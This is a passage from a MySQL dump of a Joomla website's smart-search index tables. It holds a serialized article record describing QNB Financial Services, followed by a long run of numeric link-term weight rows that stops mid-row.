User\";s:6:\"layout\";s:7:\"article\";s:4:\"path\";s:24:\"index.php/84-uae/134-qnb\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:3:\"UAE\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:3:\"UAE\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:5:\"en-GB\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:5:\"en-GB\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:48:\"index.php?option=com_content&view=article&id=134\";s:5:\"route\";s:76:\"index.php?option=com_content&view=article&id=134:qnb&catid=84:uae&Itemid=435\";s:5:\"title\";s:3:\"QNB\";s:11:\"description\";s:667:\"QNB Financial Services QNB Financial Services (QNB FS) was established in the last quarter of 2010 as part of the QNB Group, offering a range of financial services to foreign institutional investors, mutual funds, domestic institutional investors, high net- worth individuals, retail and corporate clients. QNB FS launched its brokerage unit in May 2011 providing both individual and institutional clients access to stocks listed on the Qatar securities markets.baseline; color: #394040;\"> It also provides access to stock trading on European and U.S. markets. Moreover, QNB FS offers world-class research and analysis enabling you to make sound investment decisions.\";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:5:\"en-GB\";s:18:\"publish_start_date\";s:19:\"2014-03-31 06:04:29\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2014-03-31 06:04:29\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:3;s:15:\"defaultLanguage\";s:5:\"en-GB\";}'); /*!40000 ALTER TABLE `fit_finder_links` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `fit_finder_links_terms0` -- DROP TABLE IF EXISTS `fit_finder_links_terms0`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `fit_finder_links_terms0` ( `link_id` int(10) unsigned NOT NULL, `term_id` int(10) unsigned NOT NULL, `weight` float unsigned NOT NULL, PRIMARY KEY (`link_id`,`term_id`), KEY `idx_term_weight` (`term_id`,`weight`), KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `fit_finder_links_terms0` -- LOCK TABLES `fit_finder_links_terms0` WRITE; /*!40000 ALTER TABLE `fit_finder_links_terms0` DISABLE KEYS */; INSERT INTO `fit_finder_links_terms0` VALUES (35,35,0.23331),(2,35,0.39996),(110,35,2.09979),(3,40,0.18662),(3,41,0.86331),(3,42,1.05),(3,43,0.95669),(3,44,1.09669),(3,45,0.93338),(3,46,1.05),(3,47,1.19),(3,48,1.02669),(3,49,1.09669),(3,50,0.28),(3,51,0.93331),(3,52,1.05),(3,53,0.32669),(3,54,1.09669),(3,55,1.21331),(3,56,0.32669),(3,57,0.95669),(3,58,1.23669),(3,59,0.93345),(3,60,1.07331),(3,61,1.33),(3,62,0.91),(3,63,1.14331),(3,64,0.95669),(3,65,1.09669),(3,66,0.93331),(3,67,1.16669),(3,68,0.95669),(3,69,1.07331),(3,70,0.56004),(5,70,0.56004),(9,70,0.56004),(20,70,0.56004),(21,70,0.56004),(22,70,0.56004),(23,70,0.56004),(24,70,0.56004),(25,70,0.56004),(35,70,0.56004),(40,70,0.56004),(52,70,0.56004),(55,70,0.56004),(58,70,0.56004),(68,70,0.56004),(77,70,0.56004),(103,70,0.56004),(104,70,0.56004),(105,70,0.56004),(106,70,0.56004),(107,70,0.56004),(109,70,0.56004),(110,70,0.56004),(111,70,0.56004),(112,70,0.56004),(113,70,0.56004),(114,70,0.56004),(116,70,0.56004),(117,70,0.56004),(118,70,0.56004),(119,70,0.56004),(120,70,0.56004),(121,70,0.56004),(123,70,0.56004),(125,70,0.56004),(126,70,0.56004),(128,70,0.56004),(129,70,0.56004),(130,70,0.56004),(133,70,0.56004),(134,70,0.56004),(35,71,0.01169),(103,71,0.01169),(116,71,0.01169),(117,71,0.02338),(125,71,0.02338),(3,71,0.03507),(111,71,0.03507),(113,71,0.03507),(119,71,0.03507),(126,71,0.03507),(112,71,0.04676),(104,71,0.05845),(128,71,0.05845),(107,71,0.07014),(110,71,0.07014),(123,71,0.08183),(105,71,0.09352),(120,71,0.09352),(3,72,0.88669),(3,73,1.00331),(3,74,0.98),(3,75,1.19),(3,76,0.91),(3,77,1.00331),(3,78,0.28),(3,79,1.02669),(3,80,1.12),(3,252,0.51331),(3,253,1.12),(3,254,1.19),(3,255,0.56),(3,256,0.93331),(3,257,1.12),(3,258,0.88669),(3,259,0.95669),(3,260,1.05),(3,261,1.21331),(3,262,0.84),(3,263,1.05),(3,264,0.56),(3,265,1.00331),(3,266,1.09669),(3,267,0.98),(3,268,1.05),(3,269,0.7),(3,270,4.43345),(3,271,1.16669),(3,272,1.00331),(3,273,1.05),(3,274,1.02669),(3,275,1.05),(3,276,1.12),(3,277,1.12),(3,278,1.19),(3,279,1.14331),(3,280,1.33),(9,281,0.39996),(128,281,0.39996),(3,281,0.79992),(5,281,0.79992),(20,281,0.79992),(21,281,0.79992),(22,281,0.79992),(23,281,0.79992),(24,281,0.79992),(25,281,0.79992),(35,281,0.79992),(40,281,0.79992),(52,281,0.79992),(55,281,0.79992),(58,281,0.79992),(68,281,0.79992),(77,281,0.79992),(103,281,0.79992),(105,281,0.79992),(106,281,0.79992),(107,281,0.79992),(109,281,0.79992),(110,281,0.79992),(111,281,0.79992),(112,281,0.79992),(113,281,0.79992),(114,281,0.79992),(116,281,0.79992),(117,281,0.79992),(118,281,0.79992),(119,281,0.79992),(120,281,0.79992),(121,281,0.79992),(123,281,0.79992),(125,281,0.79992),(126,281,0.79992),(129,281,0.79992),(130,281,0.79992),(133,281,0.79992),(134,281,0.79992),(104,281,1.26654),(9,282,1.59996),(128,282,1.59996),(3,282,3.19992),(5,282,3.19992),(20,282,3.19992),(21,282,3.19992),(22,282,3.19992),(23,282,3.19992),(24,282,3.19992),(25,282,3.19992),(35,282,3.19992),(40,282,3.19992),(52,282,3.19992),(55,282,3.19992),(58,282,3.19992),(68,282,3.19992),(77,282,3.19992),(103,282,3.19992),(104,282,3.19992),(105,282,3.19992),(106,282,3.19992),(107,282,3.19992),(109,282,3.19992),(110,282,3.19992),(111,282,3.19992),(112,282,3.19992),(113,282,3.19992),(114,282,3.19992),(116,282,3.19992),(117,282,3.19992),(118,282,3.19992),(119,282,3.19992),(120,282,3.19992),(121,282,3.19992),(123,282,3.19992),(125,282,3.19992),(126,282,3.19992),(129,282,3.19992),(130,282,3.19992),(133,282,3.19992),(134,282,3.19992),(5,375,0.00581),(52,375,0.00581),(58,375,0.00581),(121,375,0.00581),(134,375,0.00581),(55,375,0.01162),(68,375,0.01162),(35,375,0.01743),(40,375,0.01743),(114,375,0.02324),(116,375,0.02324),(9,375,0.02905),(128,375,0.02905),(109,375,0.03486),(123,375,0.03486),(118,375,0.04067),(107,375,0.0581),(111,375,0.0581),(113,375,0.06391),(126,375,0.06391),(104,375,0.07553),(105,375,0.08134),(106,375,0.08715),(117,375,0.08715),(112,375,0.10458),(125,375,0.10458),(103,375,0.12782),(110,375,0.12782),(119,375,0.13363),(120,375,0.16849),(5,376,0.91),(5,377,1.07331),(119,419,0.28),(5,419,0.48),(40,419,0.48),(52,419,0.48),(55,419,0.48),(58,419,0.48),(68,419,0.48),(113,419,0.48),(116,419,0.48),(117,419,0.48),(121,419,0.48),(123,419,0.48),(125,419,0.48),(126,419,0.48),(129,419,0.48),(130,419,0.48),(133,419,0.48),(5,420,2.00004),(40,420,2.00004),(52,420,2.00004),(55,420,2.00004),(58,420,2.00004),(68,420,2.00004),(113,420,2.00004),(116,420,2.00004),(117,420,2.00004),(121,420,2.00004),(123,420,2.00004),(125,420,2.00004),(126,420,2.00004),(129,420,2.00004),(130,420,2.00004),(133,420,2.00004),(9,434,0.93331),(9,435,1.02669),(9,436,0.84),(9,437,0.95669),(9,438,0.88669),(9,439,1.00331),(9,440,0.86331),(9,441,0.98),(9,442,0.91),(9,443,1.02669),(55,444,0.0175),(109,444,0.0175),(52,444,0.035),(111,444,0.035),(25,444,0.05),(9,444,0.0525),(40,444,0.0525),(134,444,0.07),(128,444,0.0875),(68,444,0.105),(104,444,0.1225),(118,444,0.1225),(133,444,0.1225),(123,444,0.14),(116,444,0.1925),(35,444,0.21),(126,444,0.21),(125,444,0.2625),(113,444,0.315),(107,444,0.3325),(112,444,0.35),(105,444,0.385),(119,444,0.4025),(103,444,0.4375),(117,444,0.4725),(120,444,0.5075),(106,444,0.5775),(110,444,1.3475),(9,445,0.88669),(9,446,0.95669),(9,447,0.98),(9,448,1.14331),(9,449,0.98),(9,450,1.19),(9,451,0.0175),(114,451,0.0175),(119,451,0.0175),(121,451,0.0175),(111,451,0.035),(112,451,0.035),(116,451,0.035),(123,451,0.035),(117,451,0.0525),(125,451,0.0525),(107,451,0.07),(118,451,0.0875),(103,451,0.1225),(113,451,0.1575),(110,451,0.1925),(9,452,0.98),(9,453,1.02669),(9,540,0.28),(9,541,0.91),(9,542,1.07331),(120,543,0.18669),(125,543,0.18669),(9,543,0.74676),(9,544,0.91),(9,545,0.98),(9,546,0.88669),(9,547,1.09669),(9,548,0.95669),(9,549,1.09669),(9,550,0.91),(9,551,1.12),(9,552,0.02919),(113,552,0.02919),(120,552,0.02919),(9,553,0.93331),(9,554,1.02669),(9,555,0.28),(120,555,0.28),(126,555,0.28),(9,556,0.98),(9,557,1.12),(35,1531,0.93331),(110,1531,0.93331),(110,1716,0.37331),(120,1716,0.37331),(35,1716,0.74662),(113,1716,1.11993),(134,1716,1.11993),(126,1716,1.97321),(35,1721,1.11993),(110,1721,1.11993),(133,1721,1.11993),(120,1721,1.86655),(35,1722,1.12),(133,1726,0.42),(110,1726,0.84),(113,1726,0.84),(35,1726,2.1),(116,1726,2.22),(117,1726,2.22),(20,3024,0.18669),(20,3025,0.91),(21,3040,0.37331),(128,3040,0.74662),(21,3041,1.05),(109,3052,0.18662),(24,3052,0.22661),(111,3052,0.27993),(24,3053,2.09661),(35,3059,0.14),(25,3059,0.48),(35,3060,0.91),(25,3060,3.12),(25,3061,2.5334),(35,9223,1.00331),(35,9224,1.09669),(35,9225,0.88669),(35,9226,1.09669),(35,9227,1.16669),(105,9228,0.02919),(110,9228,0.02919),(117,9228,0.02919),(118,9228,0.02919),(120,9228,0.02919),(125,9228,0.02919),(103,9228,0.05838),(107,9228,0.05838),(112,9228,0.05838),(123,9228,0.05838),(126,9228,0.05838),(119,9228,0.11676),(35,9228,0.15429),(35,9229,4.68679),(35,9230,1.07331),(35,9231,0.46669),(35,9232,1.02669),(35,9233,1.21331),(35,9234,0.32669),(35,9235,1.00331),(35,9236,1.14331),(35,9237,0.23331),(35,9238,0.95669),(35,9239,1.02669),(35,9240,0.23331),(52,9240,0.23331),(103,9240,0.23331),(119,9240,0.23331),(110,9240,0.46662),(35,9241,0.98),(35,9242,1.05),(35,9243,0.98),(35,9244,1.12),(35,9245,0.88669),(35,9246,0.95669),(35,9247,0.91),(35,9248,1.05),(35,9249,0.84),(113,9249,0.84),(120,9249,0.84),(110,9249,1.68),(35,9250,0.98),(35,9251,0.98),(120,9251,0.98),(35,9252,1.14331),(35,9253,0.93331),(35,9254,1.14331),(35,9255,0.98),(35,9256,1.12),(35,9257,0.91),(40,9257,0.91),(35,9258,1.12),(35,9259,1.07331),(35,9260,1.26),(35,9261,1.96),(35,9262,1.28331),(35,9263,0.91),(35,9264,1.09669),(35,9265,0.0175),(103,9265,0.0175),(106,9265,0.0175),(120,9265,0.0175),(113,9265,0.035),(128,9265,0.035),(133,9265,0.035),(117,9265,0.0525),(110,9265,0.875),(35,9266,1.02669),(35,9267,1.09669),(133,9268,0.56),(35,9268,1.12),(68,9268,1.12),(35,9269,1.16669),(35,9270,1.09669),(35,9271,1.16669),(35,9272,0.28),(35,9273,0.98),(35,9274,1.12),(35,9275,0.14),(35,9276,1.02669),(35,9277,1.09669),(104,9278,0.01169),(114,9278,0.01169),(116,9278,0.01169),(118,9278,0.01169),(134,9278,0.01169),(111,9278,0.02338),(123,9278,0.02338),(106,9278,0.03507),(113,9278,0.03507),(125,9278,0.03507),(126,9278,0.03507),(105,9278,0.04676),(119,9278,0.04676),(35,9278,0.08183),(117,9278,0.08183),(103,9278,0.09352),(110,9278,0.09352),(120,9278,0.1169),(103,9279,0.79331),(105,9279,0.79331),(106,9279,0.79331),(111,9279,0.79331),(113,9279,0.79331),(114,9279,0.79331),(118,9279,0.79331),(119,9279,0.79331),(125,9279,0.79331),(126,9279,0.79331),(35,9279,1.58662),(35,9280,1.07331),(35,9281,0.95669),(35,9282,1.00331),(35,9283,1.07331),(35,9284,0.88669),(35,9285,1.12),(35,9286,0.86331),(134,9286,0.86331),(35,9287,0.93331),(134,9287,0.93331),(35,9288,0.84),(105,9288,0.84),(120,9288,0.84),(125,9288,0.84),(35,9289,1.00331),(35,9290,0.86331),(117,9290,0.86331),(120,9290,0.86331),(126,9290,0.86331),(35,9291,0.93331),(117,9291,0.93331),(120,9291,0.93331),(35,9292,0.28),(133,9292,0.28),(110,9292,0.56),(35,9293,0.91),(35,9294,0.98),(35,9295,1.02669),(35,9296,1.12),(35,9757,0.23331),(35,9758,0.98),(35,9759,1.12),(35,9760,0.28),(35,9761,1.00331),(35,9762,1.26),(35,9763,0.46669),(40,9763,0.46669),(134,9763,0.46669),(35,9764,1.09669),(35,9765,1.28331),(35,9766,0.37331),(110,9766,0.37331),(117,9766,0.37331),(119,9766,0.37331),(35,9767,1.05),(35,9768,1.12),(35,9769,0.28),(105,9769,0.28),(35,9770,0.91),(35,9771,0.95669),(35,9772,0.32669),(106,9772,0.32669),(113,9772,0.32669),(120,9772,0.32669),(111,9772,0.65338),(125,9772,0.98007),(118,9772,1.72679),(35,9773,1.02669),(35,9774,1.12),(35,9775,1.09669),(35,9776,1.28331),(35,9777,0.95669),(134,9777,0.95669),(35,9778,1.14331),(35,9779,0.01169),(105,9779,0.01169),(110,9779,0.01169),(111,9779,0.01169),(112,9779,0.01169),(116,9779,0.01169),(118,9779,0.01169),(125,9779,0.01169),(126,9779,0.01169),(117,9779,0.02338),(113,9779,0.03507),(103,9779,0.04676),(35,9780,0.81669),(117,9780,0.81669),(35,9781,0.91),(35,9782,1.19),(35,9783,1.30669),(35,9784,1.33),(40,9785,0.37331),(103,9785,0.37331),(133,9785,0.37331),(35,9785,1.11993),(52,9785,1.97321),(68,9785,1.97321),(113,9785,1.97321),(123,9785,1.97321),(35,9786,2.19338),(35,9787,1.16669),(35,9788,1.21331),(35,9789,1.00331),(35,9790,1.26),(35,9791,1.14331),(35,9792,1.26),(35,9793,1.00331),(35,9794,1.07331),(35,9795,1.12),(35,9796,1.19),(35,9797,1.12),(35,9798,1.26),(35,9799,0.98),(35,9800,1.07331),(35,9801,0.37331),(35,9802,1.12),(35,9803,1.21331),(35,9804,0.88669),(110,9804,1.77338),(35,9805,0.98),(35,9806,0.42),(35,9807,1.07331),(35,9808,1.14331),(120,9809,0.23331),(134,9809,0.23331),(35,9809,0.69993),(35,9810,1.02669),(35,9811,1.21331),(35,9812,2.1),(35,9813,1.21331),(35,9814,1.14331),(35,9815,0.14),(35,9816,0.18669),(116,9816,0.18669),(120,9816,0.18669),(110,9816,0.56007),(35,9817,0.86331),(110,9817,0.86331),(116,9817,0.86331),(35,9818,1.00331),(35,9819,0.23331),(35,9820,1.00331),(35,9821,1.07331),(35,9822,0.32669),(133,9822,0.32669),(35,9823,0.95669),(35,9824,1.16669),(55,10160,0.28),(68,10160,0.28),(103,10160,0.28),(123,10160,0.28),(40,10160,0.56),(52,10160,0.56),(133,10160,0.56),(109,10160,1.12),(128,10160,1.12),(121,10160,1.48),(119,10526,0.84),(125,10526,0.84),(106,10535,0.86331),(113,10535,0.86331),(125,10535,0.86331),(105,10535,1.72662),(110,10535,1.72662),(112,10535,1.72662),(120,10535,1.72662),(103,10537,0.37331),(126,10701,0.23331),(40,10787,0.93331),(40,10788,1.12),(40,10789,0.81669),(40,10790,0.88669),(40,10791,0.84),(40,10792,1.05),(40,10793,0.65331),(110,10793,0.65331),(40,10794,1.09669),(110,10794,1.09669),(40,10795,1.35331),(40,10796,0.01169),(104,10796,0.01169),(105,10796,0.01169),(116,10796,0.01169),(118,10796,0.01169),(119,10796,0.01169),(123,10796,0.01169),(125,10796,0.01169),(126,10796,0.01169),(128,10796,0.01169),(106,10796,0.02338),(113,10796,0.02338),(117,10796,0.02338),(112,10796,0.05845),(120,10796,0.07014),(103,10796,0.08183),(110,10796,0.08183),(40,10797,1.00331),(40,10798,1.12),(40,10799,1.00331),(40,10800,1.26),(40,10801,1.21331),(40,10802,0.23331),(40,10803,1.07331),(40,10804,1.21331),(40,10890,1.07331),(40,10891,1.33),(40,10892,0.14),(110,10892,0.14),(125,10892,0.14),(120,10892,0.28),(112,10892,0.42),(40,10893,0.84),(112,10893,0.84),(40,10894,1.02669),(40,10895,2.22),(40,10896,1.05),(123,10896,5.55),(40,10897,1.21331),(40,10898,0.56),(40,10899,1.19),(40,10900,1.26),(40,10901,1.07331),(40,10902,1.14331),(40,10903,0.93331),(123,10903,0.93331),(40,10904,1.07331),(58,10952,0.56),(55,11431,1.05),(133,11431,2.1),(58,11436,0.51331),(133,11436,0.51331),(68,11436,1.02662),(55,11692,0.88669),(55,11701,0.18669),(58,11813,0.23331),(52,12124,0.88669),(52,12141,1.00331),(52,12142,1.07331),(52,12143,0.32669),(52,12144,0.98),(52,12145,1.14331),(52,12146,0.91),(103,12146,0.91),(119,12146,0.91),(52,12147,1.09669),(52,12148,1.07331),(52,12149,1.21331),(52,12150,0.91),(52,12151,1.09669),(52,12241,0.28),(120,12241,0.28),(128,12241,0.28),(103,12241,1.4),(52,12242,0.95669),(52,12243,1.14331),(52,12244,0.65338),(103,12244,0.65338),(107,12244,0.65338),(52,12245,0.91),(52,12246,1.09669),(52,12247,0.91),(52,12248,1.05),(52,12249,1.00331),(52,12250,0.88669),(55,12384,1.16669),(55,12385,0.86331),(134,12385,0.86331),(55,12386,0.93331),(134,12386,0.93331),(55,12387,0.28),(113,12387,0.28),(126,12387,0.28),(107,12387,0.56),(55,12388,0.88669),(55,12389,1.02669),(55,12390,0.32669),(55,12391,1.05),(55,12392,1.19),(55,12393,0.14),(103,12393,1.4),(55,12394,0.88669),(55,12395,1.00331),(55,12396,1.07331),(55,12397,1.23669),(55,12463,0.88669),(55,12464,1.21331),(58,12574,0.91),(58,12575,1.05),(58,12576,1.00331),(58,12646,0.14),(58,12647,0.95669),(58,12648,1.02669),(58,12649,1.12),(58,12650,1.05),(58,12651,1.09669),(105,12864,0.23331),(112,12864,0.23331),(120,12864,0.23331),(110,12864,0.46662),(110,13071,0.23331),(112,13071,0.23331),(126,13071,0.23331),(68,13393,0.98),(68,13394,1.26),(68,13395,0.84),(68,13396,0.98),(68,13397,0.02919),(104,13397,0.02919),(118,13397,0.02919),(119,13397,0.02919),(103,13397,0.05838),(126,13397,0.05838),(110,13397,0.08757),(112,13397,0.11676),(120,13397,0.23352),(68,13398,0.91),(104,13398,0.91),(126,13398,0.91),(120,13398,1.82),(68,13399,1.16669),(68,13400,0.42),(68,13401,1.07331),(68,13402,1.21331),(68,13403,0.32669),(112,13403,0.32669),(68,13404,0.91),(68,13405,1.14331),(68,13406,0.18669),(103,13406,0.18669),(104,13406,0.18669),(105,13406,0.18669),(106,13406,0.18669),(118,13406,0.18669),(119,13406,0.18669),(120,13406,0.18669),(134,13406,0.18669),(113,13406,0.37338),(117,13406,0.37338),(110,13406,0.56007),(68,13407,0.84),(68,13408,0.95669),(68,13409,0.46669),(68,13410,1.00331),(68,13411,1.09669),(68,13412,0.98),(68,13413,1.05),(68,13414,1.00331),(68,13415,1.14331),(68,13416,0.88669),(68,13417,0.95669),(68,13418,0.88669),(117,13418,2.66007),(68,13419,0.98),(68,13420,0.93331),(68,13421,1.02669),(68,13422,1.05),(68,13423,1.16669),(68,13424,1.02669),(68,13425,1.21331),(68,13426,1.05),(68,13427,1.14331),(68,13428,1.09669),(68,13429,1.16669),(68,13430,0.37331),(110,13430,0.37331),(68,13431,0.95669),(68,13432,1.05),(68,13433,0.37331),(123,13433,0.37331),(128,13433,0.37331),(68,13434,0.93331),(68,13435,1.07331),(68,13436,0.42),(110,13436,0.42),(68,13437,1.05),(68,13438,1.16669),(68,13609,0.23331),(68,13610,1.02669),(68,13611,1.14331),(68,13612,0.42),(68,13613,1.00331),(68,13614,1.23669),(68,13615,0.18669),(110,13615,0.18669),(68,13616,0.86331),(68,13617,0.93331),(68,13618,0.18669),(110,13618,0.56007),(68,13619,0.86331),(68,13620,0.95669),(68,13621,5.18),(113,13621,5.18),(68,13622,6.16679),(113,13622,6.16679),(68,13623,2.8),(68,13624,1.26),(68,13625,1.33),(68,13626,1.09669),(68,13627,1.28331),(68,13628,2.28662),(68,13629,1.21331),(68,13630,1.26),(68,13631,1.19),(68,13632,1.23669),(68,13633,0.95669),(68,13634,1.19),(109,13757,0.5334),(110,13757,0.98679),(105,13774,0.37331),(103,13871,0.84),(111,13875,0.88669),(114,13875,0.88669),(126,13875,0.88669),(111,13876,0.95669),(114,13876,0.95669),(110,13877,0.46662),(120,13912,0.88669),(120,13913,0.98),(119,13920,0.56),(111,13923,0.95669),(114,13923,0.95669),(126,13923,0.95669),(113,13924,0.81669),(110,13924,1.63338),(103,13927,0.84),(104,13927,0.84),(110,13927,0.84),(112,13927,0.84),(123,13927,0.84),(125,13927,0.84),(126,13927,0.84),(107,13927,1.68),(113,13927,1.68),(105,13927,2.52),(106,14244,0.42),(120,14244,0.42),(103,14385,0.32669),(125,14385,0.32669),(133,14385,0.32669),(106,14407,0.18669),(114,14407,0.18669),(118,14407,0.18669),(133,14407,0.18669),(117,14407,0.37338),(126,14407,0.37338),(107,14407,0.56007),(103,14676,0.28),(105,15553,0.0175),(106,15553,0.0175),(111,15553,0.0175),(119,15553,0.0175),(128,15553,0.0175),(107,15553,0.035),(116,15553,0.035),(125,15553,0.035),(126,15553,0.0525),(113,15553,0.07),(103,15553,0.105),(110,15553,0.2625),(134,15754,0.04669),(105,15754,0.09338),(128,15754,0.18676),(110,15754,0.32683),(113,15754,0.42021),(113,15774,0.37331),(103,15892,0.77),(103,15893,0.91),(103,15894,0.88669),(103,15895,1.09669),(103,15896,0.93331),(103,15897,1.14331),(103,15898,0.84),(112,15898,0.84),(103,15899,0.91),(103,15900,0.91),(103,15901,1.05),(103,15902,0.81669),(103,15903,0.95669),(103,15904,0.84),(103,15905,1.02669),(103,15906,1.05),(103,15907,0.98),(103,15908,1.05),(120,15909,0.84),(103,15909,1.68),(103,15910,0.91),(103,15911,0.98),(103,15912,0.88669),(103,15913,1.00331),(103,15914,0.81669),(106,15914,0.81669),(118,15914,0.81669),(119,15914,0.81669),(128,15914,0.81669),(103,15915,0.88669),(106,15915,0.88669),(118,15915,0.88669),(128,15915,0.88669),(103,15916,0.88669),(103,15917,0.98),(103,15918,0.84),(103,15919,1.07331),(103,15920,0.91),(103,15921,1.00331),(103,15922,0.88669),(103,15923,0.95669),(103,15924,0.86331),(103,15925,1.02669),(103,15926,0.86331),(103,15927,0.91),(103,15928,0.91),(103,15929,1.09669),(103,15930,1.00331),(103,15931,1.12),(103,15932,0.81669),(116,15932,0.81669),(103,15933,0.88669),(103,15934,0.18669),(105,15934,0.18669),(106,15934,0.18669),(110,15934,0.18669),(116,15934,0.18669),(120,15934,0.18669),(103,15935,0.86331),(105,15935,0.86331),(106,15935,0.86331),(110,15935,0.86331),(116,15935,0.86331),(120,15935,0.86331),(103,15936,1.05),(103,15937,0.46669),(103,15938,1.05),(103,15939,1.21331),(103,15940,1.05),(103,15941,1.14331),(103,15942,1.00331),(103,15943,1.09669),(103,15944,0.23331),(103,15945,0.88669),(103,15946,0.95669),(103,15947,0.28),(134,15947,0.56),(103,15948,1.02669),(103,15949,1.16669),(103,15950,0.32669),(103,15951,0.93331),(103,15952,1.09669),(103,15953,0.28),(103,15954,0.98),(103,15955,1.16669),(103,15956,0.28),(110,15956,0.56),(113,15956,0.56),(103,15957,0.95669),(103,15958,1.09669),(103,15959,0.37331),(128,15959,0.37331),(103,15960,1.05),(103,15961,1.12),(103,15962,0.28),(103,15963,0.91),(103,15964,1.00331),(103,15965,0.28),(103,15966,1.00331),(103,15967,1.16669),(103,15968,0.42),(103,15969,0.98),(103,15970,1.07331),(103,15971,0.46669),(103,15972,1.02669),(103,15973,1.14331),(103,15974,0.28),(103,15975,0.91),(103,15976,1.02669),(103,15977,0.86331),(110,15977,0.86331),(120,15977,0.86331),(103,15978,1.05),(103,15979,0.93331),(118,15979,0.93331),(103,15980,1.02669),(103,15981,1.07331),(103,15982,1.33),(103,15983,0.84),(111,15983,0.84),(103,15984,0.95669),(103,15985,0.88669),(105,15985,0.88669),(103,15986,0.98),(105,15986,0.98),(103,15987,0.91),(103,15988,1.00331),(103,15989,0.88669),(103,15990,0.95669),(103,15991,0.88669),(113,15991,0.88669),(103,15992,0.98),(103,15993,0.28),(104,15993,0.28),(103,15994,1.09669),(103,15995,1.33),(103,15996,0.28),(120,15996,0.28),(126,15996,0.28),(110,15996,0.56),(103,15997,0.98),(103,15998,1.14331),(103,15999,0.68),(103,16000,1.05),(103,16001,1.12),(103,16002,0.88669),(103,16003,1.00331),(103,16004,0.01169),(112,16004,0.01169),(119,16004,0.01169),(120,16004,0.01169),(125,16004,0.02338),(103,16005,0.84),(103,16006,0.88669),(103,16007,1.02669),(103,16008,0.28),(109,16008,0.28),(110,16008,0.28),(117,16008,0.28),(128,16008,0.28),(123,16008,0.56),(103,16009,0.91),(110,16009,0.91),(117,16009,0.91),(103,16010,1.02669),(103,16011,0.95669),(103,16012,1.12),(103,16013,0.95669),(103,16014,1.05),(103,16015,0.79331),(103,16016,0.91),(103,16017,0.86331),(103,16018,0.95669),(103,16019,0.91),(120,16019,0.91),(103,16020,1.00331),(103,16021,0.93331),(103,16022,1.02669),(103,16023,1.00331),(103,16024,1.23669),(103,16025,0.86331),(110,16025,4.31655),(103,16026,1.00331),(103,16027,0.95669),(103,16028,1.02669),(103,16029,0.91),(103,16030,1.02669),(103,16031,0.88669),(103,16032,0.98),(103,16033,0.86331),(103,16034,1.00331),(103,16035,0.88669),(103,16036,1.00331),(103,16037,0.81669),(112,16037,0.81669),(113,16037,0.81669),(119,16037,0.81669),(125,16037,0.81669),(105,16037,1.63338),(103,16038,0.95669),(125,16038,0.95669),(103,16039,0.88669),(105,16039,0.88669),(103,16040,0.93331),(103,16041,0.86331),(105,16041,0.86331),(110,16041,2.58993),(103,16042,1.05),(103,16043,0.86331),(106,16043,0.86331),(117,16043,0.86331),(103,16044,0.91),(103,16045,0.86331),(103,16046,0.98),(103,16047,1.05),(103,16048,1.16669),(103,16049,0.91),(103,16050,1.07331),(103,16051,0.95669),(103,16052,1.05),(103,16053,1.02669),(103,16054,1.14331),(103,16055,0.88669),(113,16055,0.88669),(103,16056,1.00331),(103,16057,0.91),(103,16058,0.98),(103,16059,0.86331),(103,16060,0.95669),(103,16061,0.93331),(103,16062,1.00331),(103,16063,0.84),(112,16063,0.84),(119,16063,0.84),(103,16064,0.95669),(103,16065,0.91),(103,16066,1.09669),(103,16067,0.95669),(103,16068,1.05),(106,16069,0.86331),(117,16069,0.86331),(103,16069,1.72662),(103,16070,0.95669),(103,16071,0.98),(103,16072,0.95669),(103,16073,1.12),(103,16074,0.23331),(103,16075,0.95669),(103,16076,1.02669),(103,16077,0.91),(120,16077,0.91),(128,16077,0.91),(110,16077,2.73),(103,16078,1.00331),(103,16079,0.28),(103,16080,1.02669),(103,16081,1.19),(103,16082,0.18669),(103,16083,0.88669),(103,16084,0.95669),(103,16085,0.88669),(103,16086,1.00331),(103,16087,0.86331),(103,16088,1.07331),(103,16089,0.86331),(103,16090,1.05),(103,16091,0.84),(103,16092,1.05),(103,16093,0.91),(103,16094,1.05),(103,16095,0.84),(103,16096,1.02669),(103,16097,0.91),(103,16098,1.09669),(103,16099,1.68),(103,16100,0.93331),(103,16101,0.93331),(103,16102,0.86331),(103,16103,0.91),(103,16104,0.28),(104,16104,0.28),(103,16105,0.95669),(103,16106,1.16669),(110,16107,0.23331),(103,16107,0.93324),(120,16107,0.93324),(103,16108,0.98),(103,16109,1.23669),(103,16110,0.95669),(103,16111,1.19),(103,16112,0.93331),(103,16113,1.07331),(103,16114,1.05),(103,16115,1.